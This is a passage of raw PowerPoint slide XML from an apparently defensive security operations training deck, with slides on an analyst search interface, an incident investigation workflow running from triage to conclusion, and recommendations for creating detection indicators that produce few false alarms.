              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>queries to multiple internal &amp; external databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malware analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Single search interface for analysts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33795" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D0C6F22-946B-604F-B988-EF17CC4AD7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8588" y="3162300"/>
            <a:ext cx="3806825" cy="33972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slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4717FE84-BB7F-1845-88C2-FE49C7276CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Final Step Is Developing New Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7FB87F-32DA-6142-8EB4-39720117A177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979712" y="2204864"/>
            <a:ext cx="5112568" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="6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eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Incident Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B370261-F1BC-774A-9253-5BC8632297FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1835696" y="3023763"/>
            <a:ext cx="5439933" cy="1332000"/>
            <a:chOff x="2120219" y="4098749"/>
            <a:chExt cx="5439933" cy="1332000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Can 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7133EFFC-3564-4544-96FF-F999485B397C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="6084152" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="007417"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90C45663-EC27-C446-93CE-95AE33B1AF60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6258583" y="4554123"/>
              <a:ext cx="1210588" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Conclusion</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Can 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8869BCA1-6C28-DB49-A68D-A26846EDC4B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="4817734" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009B17"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042B6088-675A-3C40-8559-722353151307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5138069" y="4302237"/>
              <a:ext cx="1058175" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Synthesis</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>fusion</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Can 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF5FE16B-77AC-F641-A108-412A3D822285}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="3548071" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="53CB5C"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0302DE33-C34B-6A49-B9C5-DAC3FD17A139}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3734494" y="4302237"/>
              <a:ext cx="1326004" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Collect</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>additional</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>information</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Can 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69308408-EE69-8347-981B-D6353C74FA8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="2264219" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="53CB5C"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A56929A-D392-A442-A2A0-F52B95D753C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2661892" y="4579238"/>
              <a:ext cx="748730" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Triage</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A287D4-2A7A-D84F-9D85-67D3C53C3766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112177" y="3159352"/>
            <a:ext cx="1706685" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Possible intrusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Possible phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malware detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF684D1-8837-444D-94A1-8E37E7654E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7341662" y="3027196"/>
            <a:ext cx="1667829" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ACL update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advisory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software upgrade</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D92198-AC2C-7B4A-8FD1-BD72F5DF1EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creating indicators: recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37890" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BEF3430-8967-4D4D-9C19-EEB03E770CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="2979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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="647700" indent="-2159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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detection indicators are typically one of the results of analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good indicators do not cause many false alarms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Waste human time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Downtime / loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bigger effort for attacker to change certain feature → better IoC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
